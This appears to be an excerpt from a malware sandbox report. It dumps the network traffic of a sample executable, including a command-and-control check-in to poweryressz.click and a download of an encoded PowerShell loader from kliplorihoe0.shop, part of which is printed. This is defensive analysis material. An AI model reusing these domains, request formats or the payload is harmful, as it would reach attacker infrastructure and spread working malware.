                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 2a 97 c5 6b 37 c2 05 6e c0 9c 3d f4 e5 fc 45 d6 b5 fe 31 08 11 fa 73 1f b0 7b bd 18 a4 1d 3c 9b 78 17 86 d3 a2 3a 2d 03 bd c6 c9 29 96 f2 a6 30 0a 22 3e 86 8e 08 42 94 3f 11 a5 c5 18 da 09 c1 a2 03 3b fa 55 a9 79 4e 6d 8e 89 7c 43 f3 f5 c1 7c 55 b7 f3 56 f8 41 ed d6 31 bb 1f 63 35 46 56 bb 58 b5 9d 77 27 1d 5e 0d 0f ca db bd ce 60 5f b1 fb d1 3a e3 58 ea eb 78 f9 9b 35 8a 31 da 9c aa 65 0b ba af 05 e3 59 b8 a4 54 74 21 ff a2 7f 65 20 59 9d a9 4a b9 f7 12 07 ba 4f c9 d3 9c 46 3a 72 f4 51 54 24 71 ef be 2d b3 47 53 13 0f ba 4b f5 40 cd 67 0c 38 6b 7d 1e 11 74 84 fe 02 74 61 97 16 4d 05 b5 c0 3e 7e 8b a2 67 4c d1 67 17 9c 30 15 de c7 bc fd e6 a5 46 a1 b2 88 9c 5c c4 a5 dd d9 fb 75 fd bc 8e bf 2e 30 31 fa d4 82 ed 90 f2 36 7d 52 fb e1 3b fe c4 bc d9 1a cb 0d
                                                                                                          Data Ascii: *k7n=E1s{<x:-)0">B?;UyNm|C|UVA1c5FVXw'^`_:Xx51eYTt!e YJOF:rQT$q-GSK@g8k}ttaM>~gLg0F\u.016}R;
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 47 ed 80 f1 12 6c 23 85 ba 11 14 8a ca 21 bd fc 1f 1c fc 74 1f 37 17 30 1b 21 50 ad 54 88 e4 01 67 a3 01 5c 5d 01 9a 64 90 88 fd 08 9a ea 8f 6a 84 9d 2a 7b e0 2d 14 e3 f7 11 ae d9 4e cd bc 52 e8 18 99 95 52 66 2b 8a 2a 11 99 0b c0 63 64 ce ad 69 5f e8 a7 63 60 ad dd 72 1e 6b bb 80 67 97 04 3f 3e b7 ad 00 a2 e2 ac f6 7c 45 7a c0 0f f9 ee ab 03 7f de 3e a2 8c 39 d3 8d cb 36 6b cb d9 b1 8c b0 14 3f ee 42 b0 a3 ef 57 13 e3 44 cc 52 f8 4d 86 61 06 3b e7 0e 92 e7 15 9f a2 01 93 bc 5d a1 07 05 90 f4 3e 05 b6 54 24 65 93 5b 7c 3a 7c 51 d4 0c 5e a9 fc 5d 35 c7 d9 99 5e db bf a6 29 15 f8 19 85 8c f5 f3 bb bd 56 4a 2d 28 f5 06 72 ba 7b 52 3c 2a 52 e7 ad ba 3e d8 3a 12 9f 64 5b f2 99 82 75 6b c1 7a 13 e1 0a 1e 5e ce bf cc ac da 96 91 ba 04 42 1c 22 23 e6 c4 7a 85 79
                                                                                                          Data Ascii: Gl#!t70!PTg\]dj*{-NRRf+*cdi_c`rkg?>|Ez>96k?BWDRMa;]>T$e[|:|Q^]5^)VJ-(r{R<*R>:d[ukz^B"#zy
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 18 36 4f c9 5d c2 68 8e 1d 7f 97 5d 23 c4 da f4 f4 da 92 ff ac 54 a7 b3 5b 5f 75 91 9c 82 70 de 2a 3f cc 75 15 1e 8c 38 d8 bf f9 c1 48 87 57 78 05 3b fe a8 86 b5 df 69 03 22 c7 8f ab 26 59 67 bd 6f ba 05 20 af 7f 24 a7 f6 a2 14 f1 1d 5a 34 7f ec fd 8f d1 ea da 6a 3d 11 11 d6 c5 f3 42 a1 57 8a 25 10 7a 81 66 38 b3 07 5e e8 53 75 5d bb 2e 46 24 a6 08 91 5b 5b b6 4e a7 66 df 8f 74 ff 8c cb 88 d6 f3 b0 9a 6b fa f9 7e b2 4c 29 e6 f4 79 92 db 92 fa c6 17 37 4f 31 6b 16 a1 f1 4f c3 20 d2 1c fa cc ce ee f6 4e 9a 38 8b bb b0 24 0d ed f6 7c ea 9b 9c 58 f5 40 f6 5a 0d 2e 98 68 4c 76 66 26 c8 4b e2 98 71 1e d3 10 31 06 8f 71 15 a8 eb dd fc 12 9a 2e 6d 6e 46 83 61 dd d1 62 41 6a 7d 65 c0 7c f2 2e 45 02 bb 84 7a 64 e8 75 8a 90 19 7e 7e 3e 39 c0 76 76 ce 37 b1 15 4d dc
                                                                                                          Data Ascii: 6O]h]#T[_up*?u8HWx;i"&Ygo $Z4j=BW%zf8^Su].F$[[Nftk~L)y7O1kO N8$|X@Z.hLvf&Kq1q.mnFabAj}e|.Ezdu~~>9vv7M
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: ac cc bf b5 41 07 38 56 3a fd de 9f bd 52 03 a0 52 4b 6f e7 d9 8c e3 2e fe f8 eb 10 93 04 df d5 47 8d 00 d0 18 c0 6a 57 b1 c9 be 23 23 3f 05 6c 06 1c 7c 42 ae 43 e9 9b 4e 52 2a 82 a2 ad 8e 4b 87 5f f5 28 58 8e a4 3d bc eb 3e 48 1f 9b a4 a6 ca d7 bb 49 2f fc 80 68 8a d8 d0 47 f3 a3 33 c0 67 a0 f3 8e 40 fb ff 2b 8b ad 49 ff fb 93 23 13 e4 93 b8 a2 60 94 4c c3 ae 7a 0c a7 d3 53 80 cd 08 f6 f4 0f 81 14 5e 90 95 6b 1c c5 38 05 48 b3 79 3e 9c 46 d3 33 31 d1 f0 c7 d9 d8 33 61 0a 40 02 c5 38 25 e4 aa 82 54 ce 92 5b 47 39 76 45 3d 88 0c 15 03 67 dd d2 b1 b0 5a d8 0d a9 95 df 6e 28 6a 54 b0 18 ea 56 cd 69 5a 1c ca 01 24 bf 75 6b a4 30 0d 1d 21 8c 28 71 dc 78 00 d9 93 50 2f 27 e8 57 da dc 34 1f 1b 9a 7d bd 8d 44 ca 1f c4 4d 52 29 71 9b b7 9e 31 bb 24 f8 ec e4 d3 9f
                                                                                                          Data Ascii: A8V:RRKo.GjW##?l|BCNR*K_(X=>HI/hG3g@+I#`LzS^k8Hy>F313a@8%T[G9vE=gZn(jTViZ$uk0!(qxP/'W4}DMR)q1$
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 4e 82 0e 15 92 e7 e9 9a 5b bc 70 73 31 4f 5e 43 fb 89 f4 91 7e eb a6 e2 d3 b2 8b 9a cd a5 e8 77 f1 9b 8d 01 9d aa aa 0b e8 bc be 54 67 97 6f 07 77 b3 8a 6e 84 fe cc 0e 54 3b 29 0b 3d dd 4f d5 7d b2 c5 7c 3b d8 d3 56 2f df fc 9f 3e 55 64 ba 02 44 55 c2 01 b3 bf e4 cd 2c a7 0c 67 88 96 47 f5 19 57 39 b4 44 04 e7 c9 89 70 de e1 41 14 1c a7 c1 ee da 83 43 21 bc e4 c7 27 a5 0b c5 87 4d ce bd ef df 0e 0e de b6 78 84 f3 df 78 f0 20 7c 71 10 c4 3e 80 6f 44 bb f0 60 fc 8e 55 5a c9 c7 99 32 9d 5b 55 c0 49 92 84 ca 3c 19 a8 a6 7c 87 c8 26 69 51 5b 07 11 9d 45 54 a0 47 1f 59 0a f2 9b bf 09 9a b9 1d 2d 9b 36 98 92 2b 38 5a bd 50 96 c7 dd a6 a0 e6 43 21 63 b3 48 ad 18 15 b2 fc 08 85 a9 d1 e9 b9 49 5c 24 80 01 cc 0e f6 f3 6d 36 8a 4c 29 6c 3c 44 ed 46 35 54 09 c6 41 2a
                                                                                                          Data Ascii: N[ps1O^C~wTgownT;)=O}|;V/>UdDU,gGW9DpAC!'Mxx |q>oD`UZ2[UI<|&iQ[ETGY-6+8ZPC!cHI\$m6L)l<DF5TA*
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 4e 2e 66 34 e9 ab 24 a6 27 be fd 7c 96 55 b9 02 c0 71 cd aa 4b 03 36 10 21 35 18 89 ec 73 5f b4 dc 36 e7 fa cc 6f e1 51 b0 4e bf 5f 41 02 a8 58 fb f7 c1 57 c6 8d a6 b4 9d bb 19 d7 de 46 33 e8 1c 88 33 d5 55 f4 1d 62 4a b7 f7 25 ee 37 0e 58 b0 1f 22 a7 8d fb 52 8e 3e 76 29 55 b9 ec 5c 7e e0 c9 5a c0 54 cb a3 05 6f d5 d9 3c 29 50 7c 55 f7 e4 9b 8e 20 c6 27 ce 6e 01 94 76 c5 ca 0d ce 4a 7e 66 73 5f d0 7e 14 95 1d 70 c0 6e 56 90 52 f6 bf 31 ad 07 81 3d 6e 83 30 64 3a 9b 00 f2 79 49 ea 5a c7 07 d8 7d e1 26 c0 04 a6 00 aa a8 2b 4d 84 e0 0c 75 7c 50 69 11 2d e3 e7 eb 71 a2 f3 9f de 12 48 2e ff 37 e6 20 de c9 65 65 23 24 8c 55 42 ac 56 79 e3 e3 67 31 e7 dc a0 46 51 90 73 07 74 7f 76 56 64 6a 73 3c 0e f8 fe ac 96 03 a8 45 a1 d5 01 c9 a0 92 0f a0 b9 36 d8 8c d4 fc
                                                                                                          Data Ascii: N.f4$'|UqK6!5s_6oQN_AXWF33UbJ%7X"R>v)U\~ZTo<)P|U 'nvJ~fs_~pnVR1=n0d:yIZ}&+Mu|Pi-qH.7 ee#$UBVyg1FQstvVdjs<E6
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: a7 7f 1e aa d7 f2 63 0b 2d 23 55 ac ff ca 1e cc 8e 0e c5 d5 82 11 3f 97 e7 55 00 36 b4 9b 03 1a a7 d8 19 f7 5c 44 2b e5 b0 2b f2 35 6e 71 02 83 52 3d 61 97 76 c9 f7 32 90 ef 99 87 da 20 70 c5 2a df 6b f9 65 75 93 58 14 4b f2 18 02 f3 d8 67 fc 46 3a 8b 9d 0d 0b be b4 d7 46 fa 9f 26 a7 cb f5 84 95 88 31 9d 43 f3 80 4d 85 6c 45 52 f2 4c d2 e3 ee 4c 9b a6 da 1b 5e 2f ec 78 4d 72 7c 49 9a 82 ea 14 35 a0 80 19 9a 49 6f a4 74 33 91 00 d1 2e f1 fd 14 c9 7d 04 3d ee 49 e5 05 df 87 d1 c5 e8 a8 41 3c 70 2b 39 01 e7 75 7f 8c 39 7f 4d c8 59 4f 4f 19 7d ed 7c af b4 c6 03 4e a3 5e 7d 2c 35 1f a3 8f 9b d5 e1 19 17 eb 89 4b da 25 b5 35 3e 64 ac f3 11 0a ec 96 42 5d 9f 5f 70 78 2d 08 32 e5 80 80 63 97 1e 66 eb bc d5 9b 6b 9d 0f 87 df df 33 1d a8 f7 d8 bb 2f 47 33 91 8c ec
                                                                                                          Data Ascii: c-#U?U6\D++5nqR=av2 p*keuXKgF:F&1CMlERLL^/xMr|I5Iot3.}=IA<p+9u9MYOO}|N^},5K%5>dB]_px-2cfk3/G3
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 7f ea b5 44 c1 16 37 5c 9a 26 ee e7 63 90 26 15 72 70 2f a6 68 03 e9 42 6a 96 4b 40 b6 ad e1 19 a7 f0 ae 8c 5f 50 d5 03 74 1e 12 64 8e cb bd a7 e6 8d 1a 88 61 3b dc 8d c6 5b 2c e1 b7 86 91 21 e7 ae 54 79 55 62 80 28 63 a5 9f b4 fa 81 8e 64 65 ea 68 d8 cb e4 aa e2 79 03 02 84 70 2f 73 a6 3e d1 56 21 04 0e 89 e5 6f e7 d6 dc c0 84 4d ee b7 38 68 16 23 15 49 1a 6b fb 5b a7 4f d7 20 99 cd eb c5 09 d4 c9 78 99 a2 e3 9b 29 bf 71 d9 2f c9 72 7f af 60 21 c9 f9 53 9c d4 30 2a 8a 9a f2 5a 29 a1 89 77 7b 8e 37 bb 94 bb 7f b0 02 13 0a 82 c5 d8 9b 9e 55 95 c4 89 df b3 dd 78 2d 3b fa 4c 5d b7 33 80 7f 6d 3d 68 5d ff 2f 09 65 a6 09 e5 df a9 18 1b f8 2e a3 ed ce 13 9b ea 4f d9 a7 92 0e fe 14 95 9e 39 45 38 8f bd 66 9a d6 2c b5 91 b4 31 ef fb d6 bc e6 d9 82 1c 4a 35 a5 19
                                                                                                          Data Ascii: D7\&c&rp/hBjK@_Ptda;[,!TyUb(cdehyp/s>V!oM8h#Ik[O x)q/r`!S0*Z)w{7Ux-;L]3m=h]/e.O9E8f,1J5
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 67 8a f5 8f 8a 82 c9 90 ef cb 73 0e 59 f2 20 33 ed 6a d9 79 68 51 10 e0 7f 65 da 21 60 8b ac 70 15 24 3e 21 26 1e 45 e0 ee 10 e1 bd 48 55 fe a4 de 55 f2 ab d3 92 11 0f 20 ea 89 9f 49 95 c7 bb f5 b0 60 d2 39 69 21 a3 09 a1 4c a4 9c 4a 16 d7 48 4d 1d 53 25 d7 4c 92 18 3b 95 13 6d 02 c1 b1 50 f4 ea c8 52 20 d9 10 48 82 da 42 1a 7a 69 a2 a0 36 dc 62 af bd 2a f3 dc 0e d7 ac ea 32 2a 6c dc b8 68 b4 cc 33 17 b3 8e e1 0f 79 b9 f8 ce fe 3c 49 9b 1a ef a6 a8 9b 84 bb 23 ce 52 d7 f2 a0 0c 61 04 3f e3 1e b5 9b b8 02 66 91 8f 60 25 aa c6 b1 4a 78 49 04 1b dd df 33 53 3c d6 17 29 01 4e b6 f6 3e 35 02 59 56 e7 59 c4 bb 94 4c 54 e2 50 aa 98 d0 f9 5d 89 80 ae 1f 1d 1a fb f7 11 c4 f4 5b f5 99 ba a3 f0 c1 14 50 1d 25 b9 ae ca ec b8 cf 4a 98 08 2f 4a ea fa de b7 36 a7 ad ba
                                                                                                          Data Ascii: gsY 3jyhQe!`p$>!&EHUU I`9i!LJHMS%L;mPR HBzi6b*2*lh3y<I#Ra?f`%JxI3S<)N>5YVYLTP][P%J/J6
                                                                                                          2024-12-13 15:48:49 UTC1027INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:49 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=c9fvfdos4upl2pof7pcmv44dfv; expires=Tue, 08-Apr-2025 09:35:28 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KEEYAdzraCyc7e6IEGbYcplreWHVhAi%2B%2Fa6doaheBzJ7j2kE58XNzMbu0zt2QZ9B7DDq9DwO46vy%2FS%2Fage08I9ltgmryMFsXrtaviiSCitEFkD3Fm7LZrNTIfHXhDG1FX2NyBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1719b13a2443d0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1685&rtt_var=643&sent=311&recv=574&lost=0&retrans=0&sent_bytes=2845&recv_bytes=558564&delivery_rate=1688837&cwnd=173&unsent_bytes=0&cid=3a8cb25b22c7751c&ts=3123&x=0"


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.949807172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:51 UTC265OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 79
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:51 UTC79OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 6e 39 26 6a 3d 26 68 77 69 64 3d 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42
                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--n9&j=&hwid=16BFD64353F6F7988916307CF382561B
                                                                                                          2024-12-13 15:48:52 UTC1018INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:51 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=ovcboql96vrjud9kf56j0ko8jc; expires=Tue, 08-Apr-2025 09:35:30 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IaO%2Bd2UgY2HbuNaRqK7xm9glQBAA32VShFFLEKlH13mg2NNK9GsPLnu%2B6OtFRIC7vtrXM2nm8LGCIrS%2BnKNtr1z8hNYYHgmKkTxvszBpcJt1Upelu5mxbaXlntgClaIqPsGcGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1719ccfa274241-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1725&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=980&delivery_rate=1645070&cwnd=203&unsent_bytes=0&cid=68a999287cf77d70&ts=1026&x=0"
                                                                                                          2024-12-13 15:48:52 UTC234INData Raw: 65 34 0d 0a 4a 68 6d 42 33 73 53 62 4a 5a 47 5a 41 36 39 48 73 5a 46 36 35 32 36 42 58 2b 34 62 5a 53 72 62 6d 67 41 37 55 74 66 37 47 4b 6c 39 59 71 4f 72 35 71 45 48 2b 65 31 33 33 7a 53 4c 7a 56 57 37 51 65 6f 7a 68 32 73 4a 52 61 6e 7a 61 46 51 33 35 39 56 72 77 55 6c 70 33 66 47 74 39 56 48 4f 2b 6d 2f 66 47 4e 33 31 43 4c 67 65 34 44 48 41 62 78 31 65 2b 62 59 69 58 53 62 31 77 53 71 46 42 48 79 6a 35 50 58 6d 43 65 71 37 64 6f 31 39 6b 2f 6b 4f 6b 78 37 79 5a 62 49 30 4f 51 57 6f 39 6d 39 50 4a 62 61 56 66 34 64 46 64 75 79 43 36 2f 31 4d 2f 66 78 66 67 42 54 59 39 68 65 47 4a 75 51 2b 67 6d 38 4e 42 4c 37 69 5a 52 6c 2b 39 5a 31 73 69 78 77 70 72 66 79 68 75 52 2b 68 35 46 34 3d 0d 0a
                                                                                                          Data Ascii: e4JhmB3sSbJZGZA69HsZF6526BX+4bZSrbmgA7Utf7GKl9YqOr5qEH+e133zSLzVW7Qeozh2sJRanzaFQ359VrwUlp3fGt9VHO+m/fGN31CLge4DHAbx1e+bYiXSb1wSqFBHyj5PXmCeq7do19k/kOkx7yZbI0OQWo9m9PJbaVf4dFduyC6/1M/fxfgBTY9heGJuQ+gm8NBL7iZRl+9Z1sixwprfyhuR+h5F4=
                                                                                                          2024-12-13 15:48:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.949813172.67.182.1354437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:53 UTC211OUTGET /int_clp_ldr_pan.txt HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Host: kliplorihoe0.shop
                                                                                                          2024-12-13 15:48:54 UTC901INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:54 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 10013
                                                                                                          Connection: close
                                                                                                          Accept-Ranges: bytes
                                                                                                          ETag: "7097d81386f596e08a7df136f7b5b3c3"
                                                                                                          Last-Modified: Wed, 11 Dec 2024 21:20:51 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tjl6374StBJXHLBUs4WhMrjaFWYONlmNAilCH4GqlvGodpNB49Q6BMixtmj1bmC3jJWuUsH3ziS2fX9XB1jM60y9zZZrFFiM5cEjkS6FGWnpOp8iNxH34AsP8oMKJIO1APe3rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1719ddc9550cb0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1800&rtt_var=823&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=825&delivery_rate=1220735&cwnd=242&unsent_bytes=0&cid=80a4e6076d4d13a6&ts=661&x=0"
                                                                                                          2024-12-13 15:48:54 UTC468INData Raw: 2d 45 4e 63 20 4c 67 41 6f 41 43 67 41 52 77 42 46 41 46 51 41 4c 51 42 32 41 47 45 41 55 67 42 4a 41 45 45 41 51 67 42 4d 41 47 55 41 49 41 41 6e 41 43 6f 41 54 51 42 6b 41 48 49 41 4b 67 41 6e 41 43 6b 41 4c 67 42 75 41 47 45 41 54 51 42 6c 41 46 73 41 4d 77 41 73 41 44 45 41 4d 51 41 73 41 44 49 41 58 51 41 74 41 47 6f 41 62 77 42 4a 41 47 34 41 4a 77 41 6e 41 43 6b 41 49 41 41 6f 41 43 67 41 4b 41 41 6e 41 46 4d 41 52 51 42 30 41 43 30 41 64 67 42 68 41 46 49 41 53 51 42 68 41 45 49 41 62 41 42 6c 41 43 41 41 4b 41 41 32 41 46 4d 41 64 67 41 34 41 47 30 41 59 51 41 32 41 46 4d 41 64 67 41 72 41 44 59 41 55 77 42 32 41 45 59 41 57 67 41 32 41 46 4d 41 64 67 41 70 41 43 41 41 49 41 41 6f 41 43 41 41 57 77 42 55 41 46 6b 41 63 41 41 6e 41 43 73 41 4a 77
                                                                                                          Data Ascii: -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJw
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 41 55 67 42 4a 41 45 63 41 62 41 42 55 41 46 59 41 4b 51 41 70 41 44 73 41 49 41 42 7a 41 45 55 41 64 41 41 74 41 45 6b 41 56 41 42 6c 41 45 30 41 49 41 41 67 41 46 59 41 59 51 42 79 41 47 6b 41 59 51 42 69 41 47 77 41 5a 51 41 36 41 44 67 41 51 51 42 51 41 47 4d 41 49 41 41 67 41 43 67 41 49 41 42 62 41 46 51 41 65 51 42 77 41 47 55 41 58 51 41 6f 41 44 59 41 55 77 42 32 41 48 73 41 4d 51 42 39 41 48 73 41 4d 67 42 39 41 48 73 41 4d 41 42 39 41 43 63 41 4b 77 41 6e 41 44 59 41 55 77 42 32 41 43 41 41 4c 51 42 47 41 43 41 41 62 41 42 55 41 46 59 41 52 41 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 46 4d 41 57 51 42 7a 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 46 41 45 30 41 4c 67 42 6e 41 46 55 41 4a 77 41 72 41 43
                                                                                                          Data Ascii: AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArAC
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 56 67 42 66 41 47 4d 41 62 41 42 77 41 46 38 41 63 41 42 68 41 47 34 41 4c 67 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 48 4d 41 4f 67 41 76 41 43 38 41 61 77 42 73 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 77 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 62 67 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 47 67 41 62 77 42 68 41 43 34 41 63 77 42 6f 41 43 63 41 4b 77 41 6e 41 47 38 41 62 41 42 55 41 46 59 41 4c 41 42 73 41 46 51 41 56 67 42 70 41 47 77 41 56 41 42 57 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 46 4d 41 5a 51 42 30 41 43 30 41 56 67 42 68 41 48 49 41 61 51 42 68 41 47 49 41 62 41 42 6c 41 43 41 41 4c 51 42 4f 41 47 45 41 62 51 42 6c 41 43 41 41 64 77 42 46 41 45 49
                                                                                                          Data Ascii: VgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEI
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 67 42 54 41 48 59 41 65 77 41 79 41 48 30 41 65 77 41 7a 41 48 30 41 65 77 41 78 41 48 30 41 4a 77 41 72 41 43 63 41 65 77 41 77 41 48 30 41 4e 67 42 54 41 48 59 41 4c 51 42 6d 41 43 41 41 62 41 42 55 41 46 59 41 4a 77 41 72 41 43 63 41 59 51 42 74 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 55 77 42 30 41 48 49 41 5a 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 46 4d 41 65 51 42 7a 41 47 77 41 56 41 42 57 41 43 77 41 62 41 42 55 41 46 59 41 64 41 42 6c 41 47 30 41 4c 67 42 4a 41 45 38 41 4c 67 42 4e 41 47 55 41 62 51 42 76 41 48 49 41 65 51 42 73 41 46 51 41 56 67 41 70 41 43 6b 41 43 67 41 67 41 43 41 41 49 41 41 67 41 45 51 41 65 51 42 46 41 48 73 41 54 51 42 6c 41 47 30 41 51 67 42 56 41 47 30 41 62 77 42 79 41 48 6b 41
                                                                                                          Data Ascii: gBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwByAHkA
                                                                                                          2024-12-13 15:48:54 UTC1369INData Raw: 42 68 41 48 49 41 61 51 42 68 41 47 49 41 62 41 42 6c 41 43 41 41 4c 51 42 4f 41 47 45 41 62 51 42 6c 41 43 41 41 51 51 42 77 41 46 41 41 52 41 42 42 41 46 51 41 59 51 42 51 41 47 45 41 56 41 42 49 41 43 41 41 4c 51 42 57 41 47 45 41 62 41 42 31 41 47 55 41 49 41 41 6f 41 45 51 41 65 51 42 46 41 47 4d 41 52 77 41 77 41 46 45 41 4f 67 41 36 41 43 67 41 4e 67 42 54 41 48 59 41 65 77 41 78 41 48 30 41 65 77 41 77 41 48 30 41 4e 67 42 54 41 48 59 41 49 41 41 74 41 47 59 41 62 41 42 55 41 43 63 41 4b 77 41 6e 41 46 59 41 5a 51 42 73 41 46 51 41 56 67 41 73 41 47 77 41 56 41 42 57 41 45 4d 41 62 77 42 74 41 47 49 41 61 51 42 75 41 43 63 41 4b 77 41 6e 41 47 77 41 56 41 42 57 41 43 6b 41 4c 67 42 4a 41 47 34 41 64 67 42 76 41 47 73 41 5a 51 41 6f 41 45 51 41 65
